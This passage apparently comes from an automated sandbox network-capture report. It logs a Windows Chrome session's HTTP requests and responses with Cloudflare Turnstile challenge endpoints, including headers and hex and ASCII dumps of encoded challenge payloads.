                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/va3bb/0x4AAAAAABAbx3VGqcPC-OGo/auto/fbE/new/normal/auto/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-17 16:42:36 UTC16384OUTData Raw: 44 74 59 4d 35 6e 70 38 69 6e 30 33 59 2d 2b 51 46 70 50 4f 59 61 66 70 77 51 30 2b 35 51 54 51 77 30 51 34 51 54 4d 70 55 59 51 47 2d 51 67 4d 6e 69 2b 61 53 51 36 4d 51 55 6e 6c 59 51 44 6e 51 73 6b 64 24 51 53 55 70 53 6b 39 6e 51 6e 63 51 65 55 61 47 4c 73 61 6e 2b 51 56 2d 77 59 70 64 24 41 53 57 51 66 51 6e 41 55 70 78 62 71 61 51 6b 44 43 51 4a 59 70 62 51 7a 59 30 51 64 66 46 4d 70 32 5a 2b 53 73 51 58 51 77 59 75 4f 65 4f 51 66 2b 51 61 6b 59 51 51 50 7a 2b 57 51 68 54 69 51 33 69 69 50 41 73 57 46 4f 4d 61 36 44 35 61 48 34 38 32 6a 75 35 59 50 6d 49 2d 24 34 56 59 51 48 34 6a 6d 74 63 73 51 2d 69 54 65 51 59 37 41 7a 35 65 51 6c 4d 70 32 6f 49 59 46 4a 49 4e 78 78 76 65 51 32 4c 42 44 7a 69 7a 76 49 31 50 78 33 31 4a 41 76 49 6d 4e 65 38 7a 62
                                                        Data Ascii: DtYM5np8in03Y-+QFpPOYafpwQ0+5QTQw0Q4QTMpUYQG-QgMni+aSQ6MQUnlYQDnQskd$QSUpSk9nQncQeUaGLsan+QV-wYpd$ASWQfQnAUpxbqaQkDCQJYpbQzY0QdfFMp2Z+SsQXQwYuOeOQf+QakYQQPz+WQhTiQ3iiPAsWFOMa6D5aH482ju5YPmI-$4VYQH4jmtcsQ-iTeQY7Az5eQlMp2oIYFJINxxveQ2LBDzizvI1Px31JAvImNe8zb
                                                        2025-03-17 16:42:36 UTC16384OUTData Raw: 4a 30 6e 43 72 45 6c 56 75 68 6d 24 4f 77 43 51 56 75 71 45 79 43 24 46 57 31 55 7a 39 35 48 46 67 75 7a 24 6e 7a 64 67 2b 5a 49 24 59 30 66 4d 5a 6e 79 78 75 42 38 7a 55 6e 35 57 30 57 7a 69 34 42 51 4a 50 34 65 51 52 75 76 51 2d 72 6f 42 51 61 57 6e 43 74 31 75 6d 45 54 5a 68 46 51 6c 45 4d 55 6e 62 75 6f 51 6e 4c 68 54 75 39 57 70 4c 24 42 75 53 45 34 53 6e 6f 75 75 45 69 2b 35 54 55 41 45 34 51 77 56 75 78 45 52 43 24 72 75 67 45 35 30 6e 5a 75 4e 45 36 4d 33 4c 75 51 48 6e 4f 70 43 75 5a 45 4c 45 68 73 70 4d 51 42 53 51 50 51 37 51 53 51 77 58 75 68 39 73 68 31 62 57 4e 69 33 73 51 51 51 52 2d 31 37 58 75 4e 63 77 24 79 66 55 6e 4d 65 57 61 4f 70 41 4d 61 55 51 51 75 56 43 32 69 77 52 32 6e 4d 7a 24 6e 4c 74 63 65 4a 51 51 6f 55 63 4f 4f 65 34 34 57
                                                        Data Ascii: J0nCrElVuhm$OwCQVuqEyC$FW1Uz95HFguz$nzdg+ZI$Y0fMZnyxuB8zUn5W0Wzi4BQJP4eQRuvQ-roBQaWnCt1umETZhFQlEMUnbuoQnLhTu9WpL$BuSE4SnouuEi+5TUAE4QwVuxERC$rugE50nZuNE6M3LuQHnOpCuZELEhspMQBSQPQ7QSQwXuh9sh1bWNi3sQQQR-17XuNcw$yfUnMeWaOpAMaUQQuVC2iwR2nMz$nLtceJQQoUcOOe44W
                                                        2025-03-17 16:42:36 UTC5992OUTData Raw: 6e 66 6a 4d 6c 58 74 52 38 66 71 50 68 42 74 6e 54 49 31 32 71 54 58 35 33 69 77 57 65 6e 4f 58 67 41 49 52 38 54 4f 79 58 6f 66 70 64 31 5a 44 53 76 43 35 6f 33 58 50 58 47 56 76 44 58 72 76 76 35 78 35 58 6f 59 7a 24 52 45 68 39 44 55 43 6a 6a 79 53 56 39 30 65 32 69 58 4e 41 41 6a 6c 44 43 65 53 4c 51 53 4a 68 6a 61 47 58 31 52 57 68 63 47 56 4a 65 72 69 6b 24 4d 72 56 65 4e 44 38 49 6d 34 6c 53 43 34 62 73 2d 24 72 4c 6d 78 72 24 49 63 63 2b 54 72 47 45 34 6b 76 33 53 46 58 74 78 6e 52 35 69 6a 33 33 53 67 68 6b 49 41 64 6d 6e 46 6e 71 38 6e 33 72 37 58 7a 49 76 2d 4e 4d 56 76 77 36 72 49 6a 2b 49 43 72 56 67 4e 24 50 51 70 45 6a 6b 44 4e 57 62 5a 47 4a 51 70 57 6e 64 37 37 51 33 73 61 34 72 43 73 51 57 46 4c 76 39 6d 76 6b 4c 6c 51 55 41 37 6b 51 4a
                                                        Data Ascii: nfjMlXtR8fqPhBtnTI12qTX53iwWenOXgAIR8TOyXofpd1ZDSvC5o3XPXGVvDXrvv5x5XoYz$REh9DUCjjySV90e2iXNAAjlDCeSLQSJhjaGX1RWhcGVJerik$MrVeND8Im4lSC4bs-$rLmxr$Icc+TrGE4kv3SFXtxnR5ij33SghkIAdmnFnq8n3r7XzIv-NMVvw6rIj+ICrVgN$PQpEjkDNWbZGJQpWnd77Q3sa4rCsQWFLv9mvkLlQUA7kQJ
                                                        2025-03-17 16:42:37 UTC322INHTTP/1.1 200 OK
                                                        Date: Mon, 17 Mar 2025 16:42:36 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 28028
                                                        Connection: close
                                                        cf-chl-gen: G99+j7nSzRoX8Z0W1VGu8+C9OjE8Omm0q+KN88UtsSkee8T4iGgj9fwLTSbAFiqI$fPz0ybDy4+KsXNHFgyJ3aA==
                                                        Server: cloudflare
                                                        CF-RAY: 921df1cbfc1b78e1-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-17 16:42:37 UTC1047INData Raw: 72 71 32 70 6c 36 71 2b 74 72 2b 43 77 63 62 46 6b 61 66 41 67 71 65 6e 71 4c 33 4b 75 63 72 42 7a 72 32 66 6a 5a 4c 42 71 4b 72 63 70 39 53 58 75 37 76 4f 31 65 53 34 7a 65 50 68 34 64 75 6e 31 38 6d 35 37 65 7a 44 76 36 72 7a 73 73 75 30 38 66 4c 33 74 2b 53 30 79 62 66 2b 36 67 4b 34 2f 74 63 41 77 2f 44 6c 31 63 49 48 42 74 76 4e 44 52 49 4a 44 2b 2f 76 2f 76 4c 54 31 2f 63 62 35 65 63 56 49 50 76 37 44 77 45 65 35 4e 76 33 49 79 63 4b 35 78 66 35 2b 65 63 72 37 67 54 6f 4c 53 4d 6f 38 79 49 73 42 76 51 39 2b 66 4d 63 51 43 77 57 45 78 54 32 4e 41 59 65 43 45 4d 31 53 45 4d 34 4f 45 4d 44 44 44 41 78 46 54 34 57 4e 7a 68 4f 52 43 67 32 58 45 41 72 54 79 46 4e 4c 53 35 55 52 6a 64 4b 50 54 70 4b 4c 56 78 71 4b 45 35 66 61 53 78 76 4d 6a 59 7a 65 6d 67
                                                        Data Ascii: rq2pl6q+tr+CwcbFkafAgqenqL3KucrBzr2fjZLBqKrcp9SXu7vO1eS4zePh4dun18m57ezDv6rzssu08fL3t+S0ybf+6gK4/tcAw/Dl1cIHBtvNDRIJD+/v/vLT1/cb5ecVIPv7DwEe5Nv3IycK5xf5+ecr7gToLSMo8yIsBvQ9+fMcQCwWExT2NAYeCEM1SEM4OEMDDDAxFT4WNzhORCg2XEArTyFNLS5URjdKPTpKLVxqKE5faSxvMjYzemg
                                                        2025-03-17 16:42:37 UTC1369INData Raw: 46 7a 34 2b 38 79 64 54 4d 76 35 47 70 6d 4d 53 37 7a 35 6d 2f 74 71 44 51 6f 4c 47 35 6f 64 66 55 30 61 6d 63 32 4f 4c 47 78 73 6d 35 75 66 50 42 79 62 48 71 35 71 2f 72 79 65 72 6d 35 63 72 59 36 74 76 54 75 66 4c 6d 33 77 58 55 79 66 55 4e 33 39 76 61 2b 38 7a 4a 2f 50 4c 6d 36 51 50 52 36 75 30 54 2b 64 77 65 44 4f 37 75 38 67 38 43 37 39 73 48 46 43 67 5a 46 77 30 72 2b 66 6f 77 48 79 54 78 4d 79 73 4c 42 52 45 52 46 51 6f 72 43 67 63 51 43 2f 30 4b 47 52 5a 42 4e 52 74 43 51 79 4d 4c 42 6b 68 4f 4f 69 38 65 45 54 38 51 48 54 49 77 56 53 55 61 52 6a 63 77 4b 79 74 4e 56 68 39 53 48 44 45 67 59 6a 74 6c 61 6d 64 57 62 57 78 72 54 6d 63 37 56 45 70 30 59 32 4e 59 4f 47 52 48 65 33 4e 58 55 45 6c 76 57 31 79 45 59 6c 4b 49 56 6e 6d 4c 58 6b 68 67 56 32
                                                        Data Ascii: Fz4+8ydTMv5GpmMS7z5m/tqDQoLG5odfU0amc2OLGxsm5ufPBybHq5q/ryerm5crY6tvTufLm3wXUyfUN39va+8zJ/PLm6QPR6u0T+dweDO7u8g8C79sHFCgZFw0r+fowHyTxMysLBRERFQorCgcQC/0KGRZBNRtCQyMLBkhOOi8eET8QHTIwVSUaRjcwKytNVh9SHDEgYjtlamdWbWxrTmc7VEp0Y2NYOGRHe3NXUElvW1yEYlKIVnmLXkhgV2
                                                        2025-03-17 16:42:37 UTC1369INData Raw: 71 61 57 57 30 73 4f 74 6c 64 62 48 73 71 72 61 79 37 57 57 33 73 2b 36 75 75 4c 54 76 72 76 57 75 74 43 76 34 2b 66 42 79 62 48 6e 38 37 50 50 77 2f 76 48 37 66 36 34 74 76 76 4b 76 74 48 63 30 4c 6e 58 79 4f 72 61 41 66 62 61 2f 67 2f 79 34 76 34 50 39 75 51 48 37 41 62 70 47 51 76 37 39 78 33 73 31 77 34 44 45 4e 37 36 49 68 54 36 4c 4f 72 70 41 53 51 4b 36 79 7a 6f 48 50 45 70 4a 43 44 31 4c 69 67 6b 2b 54 4d 59 4e 45 49 41 52 41 4d 43 46 69 42 42 53 69 46 4d 52 44 64 43 47 55 63 63 49 79 49 6a 44 7a 38 71 4a 79 52 54 52 43 34 50 56 30 67 7a 4d 31 74 4d 4e 7a 4e 66 55 44 74 45 55 7a 67 39 4c 47 42 6b 50 6a 6f 75 5a 48 4e 46 61 45 5a 41 57 58 41 33 55 32 74 6e 57 44 49 38 4e 46 64 2b 63 46 65 49 52 30 5a 63 67 47 5a 49 68 30 56 34 54 6f 79 41 66 46 4b
                                                        Data Ascii: qaWW0sOtldbHsqray7WW3s+6uuLTvrvWutCv4+fBybHn87PPw/vH7f64tvvKvtHc0LnXyOraAfba/g/y4v4P9uQH7AbpGQv79x3s1w4DEN76IhT6LOrpASQK6yzoHPEpJCD1Ligk+TMYNEIARAMCFiBBSiFMRDdCGUccIyIjDz8qJyRTRC4PV0gzM1tMNzNfUDtEUzg9LGBkPjouZHNFaEZAWXA3U2tnWDI8NFd+cFeIR0ZcgGZIh0V4ToyAfFK
                                                        2025-03-17 16:42:37 UTC1369INData Raw: 64 54 4c 78 35 33 5a 7a 38 75 68 33 74 50 50 70 65 50 58 30 36 6e 67 32 39 65 74 35 64 2f 62 73 65 72 50 36 2f 6d 33 2b 37 71 35 7a 64 66 34 41 74 67 45 2b 2f 43 39 30 64 66 47 33 4d 6a 56 77 77 66 33 34 74 6f 4c 2b 2b 58 47 44 77 44 71 36 68 4d 45 37 75 73 48 36 2f 44 66 46 42 6a 77 33 4f 45 59 4a 65 4c 6f 39 69 73 69 47 76 6f 4d 42 53 41 4c 4b 51 6f 70 38 75 38 4a 4e 75 77 70 43 79 30 7a 39 54 6b 52 44 53 54 36 48 44 63 45 41 45 59 65 49 77 5a 4b 52 69 38 4b 54 6b 70 4a 44 6c 4a 4f 44 7a 70 55 44 52 73 54 4e 45 38 73 53 53 46 6b 49 79 4a 62 4d 30 67 62 4b 44 73 71 62 46 6c 70 63 54 6c 4c 53 30 34 2b 51 46 45 77 54 48 68 58 5a 33 78 71 61 32 46 7a 54 46 52 4d 54 57 4e 57 64 32 56 54 57 47 78 62 6a 6e 35 65 62 35 4e 30 6b 49 42 77 61 6f 57 4f 6d 58 65 53
                                                        Data Ascii: dTLx53Zz8uh3tPPpePX06ng29et5d/bserP6/m3+7q5zdf4AtgE+/C90dfG3MjVwwf34toL++XGDwDq6hME7usH6/DfFBjw3OEYJeLo9isiGvoMBSALKQop8u8JNuwpCy0z9TkRDST6HDcEAEYeIwZKRi8KTkpJDlJODzpUDRsTNE8sSSFkIyJbM0gbKDsqbFlpcTlLS04+QFEwTHhXZ3xqa2FzTFRMTWNWd2VTWGxbjn5eb5N0kIBwaoWOmXeS
                                                        2025-03-17 16:42:37 UTC1369INData Raw: 50 57 7a 39 50 53 34 75 50 55 77 65 66 6e 35 36 7a 72 36 2b 7a 72 37 2b 2f 78 77 75 48 50 35 2b 66 54 38 39 58 4d 33 50 44 75 31 4f 48 32 38 39 58 52 78 66 76 6b 35 4f 54 66 31 38 2f 71 36 67 54 64 34 42 6a 6b 31 4e 55 4d 43 67 73 4e 33 66 6b 53 45 2b 34 41 2b 42 4c 2b 41 76 6f 6c 46 77 73 49 44 4f 76 70 4b 66 34 50 44 78 50 30 4d 76 59 35 38 7a 63 61 45 51 59 66 50 45 41 75 4c 79 51 41 4e 51 59 31 50 78 49 47 4a 52 6f 59 48 67 63 65 55 7a 52 51 4e 6a 41 71 52 55 34 52 4f 55 68 59 54 79 6f 58 53 56 51 36 4d 52 30 69 57 45 46 42 51 54 77 30 4c 45 64 48 53 6a 6f 38 64 45 45 31 4d 6d 68 6f 53 48 6b 74 61 6b 68 74 53 31 78 52 62 56 78 59 68 48 4a 7a 61 45 52 6e 57 46 56 5a 56 30 71 50 58 6c 35 69 68 6d 4b 4e 62 57 42 31 59 6d 4f 4a 69 32 78 62 63 6d 35 67 6a
                                                        Data Ascii: PWz9PS4uPUwefn56zr6+zr7+/xwuHP5+fT89XM3PDu1OH289XRxfvk5OTf18/q6gTd4Bjk1NUMCgsN3fkSE+4A+BL+AvolFwsIDOvpKf4PDxP0MvY58zcaEQYfPEAuLyQANQY1PxIGJRoYHgceUzRQNjAqRU4ROUhYTyoXSVQ6MR0iWEFBQTw0LEdHSjo8dEE1MmhoSHktakhtS1xRbVxYhHJzaERnWFVZV0qPXl5ihmKNbWB1YmOJi2xbcm5gj
                                                        2025-03-17 16:42:37 UTC1369INData Raw: 72 34 4d 44 46 75 37 76 50 71 4d 6e 53 30 50 58 30 30 4d 66 36 36 64 72 34 30 66 66 4e 77 41 50 75 76 64 4c 59 39 39 62 69 41 64 62 6b 43 63 58 57 35 74 6a 78 35 68 58 6e 35 67 7a 6f 44 4e 6e 4d 45 2b 54 2b 45 2f 59 63 36 51 37 64 48 78 38 46 38 69 6e 30 43 76 6a 6b 36 53 62 35 41 51 6b 43 4c 2f 77 66 39 69 63 6e 49 76 54 74 4e 7a 48 31 46 2f 37 7a 41 30 4d 41 4d 67 48 35 4d 6b 73 6f 54 44 73 2f 4a 68 34 65 44 6b 63 2f 56 68 59 6e 4d 54 68 58 46 55 68 47 4e 78 34 59 50 56 59 7a 58 31 6f 67 51 54 52 42 56 45 74 4c 59 56 63 6d 57 32 39 6f 51 58 45 30 59 6b 42 7a 4d 32 34 79 61 56 4a 62 55 48 42 55 59 30 4d 37 63 30 5a 57 56 6c 5a 47 66 30 78 63 65 45 56 39 54 49 4a 46 62 59 4b 48 55 35 4e 6f 6d 33 68 32 66 59 35 59 6a 59 78 79 65 71 4f 6b 6b 5a 4f 42 64 35
                                                        Data Ascii: r4MDFu7vPqMnS0PX00Mf66dr40ffNwAPuvdLY99biAdbkCcXW5tjx5hXn5gzoDNnME+T+E/Yc6Q7dHx8F8in0Cvjk6Sb5AQkCL/wf9icnIvTtNzH1F/7zA0MAMgH5MksoTDs/Jh4eDkc/VhYnMThXFUhGNx4YPVYzX1ogQTRBVEtLYVcmW29oQXE0YkBzM24yaVJbUHBUY0M7c0ZWVlZGf0xceEV9TIJFbYKHU5Nom3h2fY5YjYxyeqOkkZOBd5
                                                        2025-03-17 16:42:37 UTC1369INData Raw: 76 73 4c 66 37 65 32 77 35 66 58 78 74 2f 66 74 32 37 66 55 75 75 72 53 37 74 76 33 76 73 66 31 2f 4e 6e 36 34 41 44 65 44 38 76 35 79 64 33 6b 44 38 2f 67 36 41 76 6f 43 74 4d 51 36 78 38 54 43 74 76 74 44 68 44 6b 35 78 4d 64 2b 68 72 72 47 75 55 47 37 69 76 37 48 2b 6f 6a 38 4f 6b 4d 4a 66 58 37 2b 6a 44 35 46 6a 49 73 2f 50 55 32 4f 77 50 35 4a 44 77 47 4f 43 68 41 43 52 42 53 50 51 34 71 4d 45 73 52 51 78 64 46 46 7a 49 73 53 78 6b 31 47 31 63 64 58 78 74 55 49 6a 35 57 57 79 5a 58 4a 31 67 72 49 6b 52 66 4c 79 5a 6d 5a 54 45 71 54 47 55 31 55 54 4e 76 4f 6c 5a 79 64 7a 35 77 55 48 74 44 53 45 4e 30 52 59 68 6f 66 30 6c 38 5a 48 31 4f 52 6d 53 49 56 47 32 61 68 6c 68 79 62 49 78 61 6a 48 53 4e 58 5a 39 6a 6b 32 46 39 59 35 70 6c 71 49 69 5a 62 49 56
                                                        Data Ascii: vsLf7e2w5fXxt/ft27fUuurS7tv3vsf1/Nn64ADeD8v5yd3kD8/g6AvoCtMQ6x8TCtvtDhDk5xMd+hrrGuUG7iv7H+oj8OkMJfX7+jD5FjIs/PU2OwP5JDwGOChACRBSPQ4qMEsRQxdFFzIsSxk1G1cdXxtUIj5WWyZXJ1grIkRfLyZmZTEqTGU1UTNvOlZydz5wUHtDSEN0RYhof0l8ZH1ORmSIVG2ahlhybIxajHSNXZ9jk2F9Y5plqIiZbIV


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.2.449749104.18.94.414436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:37 UTC639OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/2100462587:1742228952:oCWRJ_9F7aDLWE5rdVZZqokEYX6VeFO4JC8_BuYfHPM/921df19f1aa9330c/5f0QPWAUaeKYb3u9onIZ_IkF5wttGhEKmnf8t0Zrm6E-1742229749-1.1.1.1-yhPGGuzzN6GGa3jTR0pmjl5lW63MvnU_suAvvMWiHP2s4Z8Ctt7xP0BcTNoSFFCa HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-17 16:42:37 UTC442INHTTP/1.1 400 Bad Request
                                                        Date: Mon, 17 Mar 2025 16:42:37 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 14
                                                        Connection: close
                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        cf-chl-out: JK2nBQ1aKcR0oxPOSzJFgeIkmQQmEBRfhrZirZ1rxuO9rj4bZBhRypr3Z3QdJx8oa7Q+kIGhOaT/+2GoxO237w==$hVYuKLc6k+UZTdywpJuPpg==
                                                        Server: cloudflare
                                                        CF-RAY: 921df1d1cf0a431b-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-17 16:42:37 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 38 30 7d
                                                        Data Ascii: {"err":100280}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.2.449750104.18.94.414436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:41 UTC1192OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/2100462587:1742228952:oCWRJ_9F7aDLWE5rdVZZqokEYX6VeFO4JC8_BuYfHPM/921df19f1aa9330c/5f0QPWAUaeKYb3u9onIZ_IkF5wttGhEKmnf8t0Zrm6E-1742229749-1.1.1.1-yhPGGuzzN6GGa3jTR0pmjl5lW63MvnU_suAvvMWiHP2s4Z8Ctt7xP0BcTNoSFFCa HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        Content-Length: 41220
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        Content-Type: text/plain;charset=UTF-8
                                                        cf-chl: 5f0QPWAUaeKYb3u9onIZ_IkF5wttGhEKmnf8t0Zrm6E-1742229749-1.1.1.1-yhPGGuzzN6GGa3jTR0pmjl5lW63MvnU_suAvvMWiHP2s4Z8Ctt7xP0BcTNoSFFCa
                                                        cf-chl-ra: 0
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Origin: https://challenges.cloudflare.com
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/va3bb/0x4AAAAAABAbx3VGqcPC-OGo/auto/fbE/new/normal/auto/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-17 16:42:41 UTC16384OUTData Raw: 44 74 59 4d 35 6e 70 38 69 6e 30 33 59 2d 2b 51 46 70 50 4f 59 61 66 70 77 51 30 2b 35 51 54 51 77 30 51 34 51 54 4d 70 55 59 51 47 2d 51 67 4d 6e 69 2b 61 53 51 36 4d 51 55 6e 6c 59 51 44 6e 51 73 6b 64 24 51 53 55 70 53 6b 39 6e 51 6e 63 51 65 55 61 47 4c 73 61 6e 2b 51 56 2d 77 59 70 64 24 41 53 57 51 66 51 6e 41 55 70 78 62 71 61 51 6b 44 43 51 4a 59 70 62 51 7a 59 30 51 64 66 46 4d 70 32 5a 2b 53 73 51 58 51 77 59 75 4f 65 4f 51 66 2b 51 61 6b 59 51 51 50 7a 2b 57 51 68 54 69 51 33 69 69 50 41 73 57 46 4f 4d 61 36 44 35 61 48 34 38 32 6a 75 35 59 50 6d 49 2d 24 34 56 59 51 48 34 6a 6d 74 63 73 51 2d 69 54 65 51 59 37 41 7a 35 65 51 6c 4d 70 32 6f 49 59 46 4a 49 4e 78 78 76 65 51 32 4c 42 44 7a 69 7a 76 49 31 50 78 33 31 4a 41 76 49 6d 4e 65 38 7a 62
                                                        Data Ascii: DtYM5np8in03Y-+QFpPOYafpwQ0+5QTQw0Q4QTMpUYQG-QgMni+aSQ6MQUnlYQDnQskd$QSUpSk9nQncQeUaGLsan+QV-wYpd$ASWQfQnAUpxbqaQkDCQJYpbQzY0QdfFMp2Z+SsQXQwYuOeOQf+QakYQQPz+WQhTiQ3iiPAsWFOMa6D5aH482ju5YPmI-$4VYQH4jmtcsQ-iTeQY7Az5eQlMp2oIYFJINxxveQ2LBDzizvI1Px31JAvImNe8zb
                                                        2025-03-17 16:42:41 UTC16384OUTData Raw: 4a 30 6e 43 72 45 6c 56 75 68 6d 24 4f 77 43 51 56 75 71 45 79 43 24 46 57 31 55 7a 39 35 48 46 67 75 7a 24 6e 7a 64 67 2b 5a 49 24 59 30 66 4d 5a 6e 79 78 75 42 38 7a 55 6e 35 57 30 57 7a 69 34 42 51 4a 50 34 65 51 52 75 76 51 2d 72 6f 42 51 61 57 6e 43 74 31 75 6d 45 54 5a 68 46 51 6c 45 4d 55 6e 62 75 6f 51 6e 4c 68 54 75 39 57 70 4c 24 42 75 53 45 34 53 6e 6f 75 75 45 69 2b 35 54 55 41 45 34 51 77 56 75 78 45 52 43 24 72 75 67 45 35 30 6e 5a 75 4e 45 36 4d 33 4c 75 51 48 6e 4f 70 43 75 5a 45 4c 45 68 73 70 4d 51 42 53 51 50 51 37 51 53 51 77 58 75 68 39 73 68 31 62 57 4e 69 33 73 51 51 51 52 2d 31 37 58 75 4e 63 77 24 79 66 55 6e 4d 65 57 61 4f 70 41 4d 61 55 51 51 75 56 43 32 69 77 52 32 6e 4d 7a 24 6e 4c 74 63 65 4a 51 51 6f 55 63 4f 4f 65 34 34 57
                                                        Data Ascii: J0nCrElVuhm$OwCQVuqEyC$FW1Uz95HFguz$nzdg+ZI$Y0fMZnyxuB8zUn5W0Wzi4BQJP4eQRuvQ-roBQaWnCt1umETZhFQlEMUnbuoQnLhTu9WpL$BuSE4SnouuEi+5TUAE4QwVuxERC$rugE50nZuNE6M3LuQHnOpCuZELEhspMQBSQPQ7QSQwXuh9sh1bWNi3sQQQR-17XuNcw$yfUnMeWaOpAMaUQQuVC2iwR2nMz$nLtceJQQoUcOOe44W
                                                        2025-03-17 16:42:41 UTC8452OUTData Raw: 6e 66 6a 4d 6c 58 74 52 38 66 71 50 68 42 74 6e 54 49 31 32 71 54 58 35 33 69 77 57 65 6e 4f 58 67 41 49 52 38 54 4f 79 58 6f 66 70 64 31 5a 44 53 76 43 35 6f 33 58 50 58 47 56 76 44 58 72 76 76 35 78 35 58 6f 59 7a 24 52 45 68 39 44 55 43 6a 6a 79 53 56 39 30 65 32 69 58 4e 41 41 6a 6c 44 43 65 53 4c 51 53 4a 68 6a 61 47 58 31 52 57 68 63 47 56 4a 65 72 69 6b 24 4d 72 56 65 4e 44 38 49 6d 34 6c 53 43 34 62 73 2d 24 72 4c 6d 78 72 24 49 63 63 2b 54 72 47 45 34 6b 76 33 53 46 58 74 78 6e 52 35 69 6a 33 33 53 67 68 6b 49 41 64 6d 6e 46 6e 71 38 6e 33 72 37 58 7a 49 76 2d 4e 4d 56 76 77 36 72 49 6a 2b 49 43 72 56 67 4e 24 50 51 70 45 6a 6b 44 4e 57 62 5a 47 4a 51 70 57 6e 64 37 37 51 33 73 61 34 72 43 73 51 57 46 4c 76 39 6d 76 6b 4c 6c 51 55 41 37 6b 51 4a
                                                        Data Ascii: nfjMlXtR8fqPhBtnTI12qTX53iwWenOXgAIR8TOyXofpd1ZDSvC5o3XPXGVvDXrvv5x5XoYz$REh9DUCjjySV90e2iXNAAjlDCeSLQSJhjaGX1RWhcGVJerik$MrVeND8Im4lSC4bs-$rLmxr$Icc+TrGE4kv3SFXtxnR5ij33SghkIAdmnFnq8n3r7XzIv-NMVvw6rIj+ICrVgN$PQpEjkDNWbZGJQpWnd77Q3sa4rCsQWFLv9mvkLlQUA7kQJ
                                                        2025-03-17 16:42:41 UTC135INHTTP/1.1 200 OK
                                                        Date: Mon, 17 Mar 2025 16:42:41 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4928
                                                        Connection: close
                                                        2025-03-17 16:42:41 UTC1614INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 2d 73 3a 20 64 70 68 4f 72 55 51 52 76 78 4b 49 57 4a 6e 71 74 76 54 66 44 67 68 39 38 6d 4c 41 54 51 6f 6c 65 63 31 7a 6c 33 32 30 74 30 61 37 37 74 53 63 69 68 58 67 71 66 63 62 39 62 65 52 7a 39 2f 33 74 58 2b 2f 6e 48 72 38 4f 6c 30 32 78 4e 50 6d 77 52 45 6b 6b 77 52 71 77 75 42 72 36 37 47 48 52 38 57 31 38 42 54 68 58 43 63 77 47 79 4d 51 62 44 44 30 50 6b 6a 38 56 6e 4a 6b 44 57 59 63 61 79 33 69 50 44 5a 33 57 6f 55 68 30 55 42 55 72 34 4c 51 61 4f 50 6e 30 38 58 55 64 74 45 43 50 4f 55 47 49 53 47 39 62 48 45 54 33 53 67 73 4a 69 56 32 50 55 4f 69 49 38 56 44 6d 36 33 67 66 6b 2f 43 49 53 61 66 61 52 53 6d 6a 73 30 2b 62 56 69 65 44 57 51 33 41 77 31 54 65 79 45 63 33 47 6d 49 6b 4f 55 41 42 69 34 54 4c 6d 64 54 6a
                                                        Data Ascii: cf-chl-out-s: dphOrUQRvxKIWJnqtvTfDgh98mLATQolec1zl320t0a77tScihXgqfcb9beRz9/3tX+/nHr8Ol02xNPmwREkkwRqwuBr67GHR8W18BThXCcwGyMQbDD0Pkj8VnJkDWYcay3iPDZ3WoUh0UBUr4LQaOPn08XUdtECPOUGISG9bHET3SgsJiV2PUOiI8VDm63gfk/CISafaRSmjs0+bVieDWQ3Aw1TeyEc3GmIkOUABi4TLmdTj
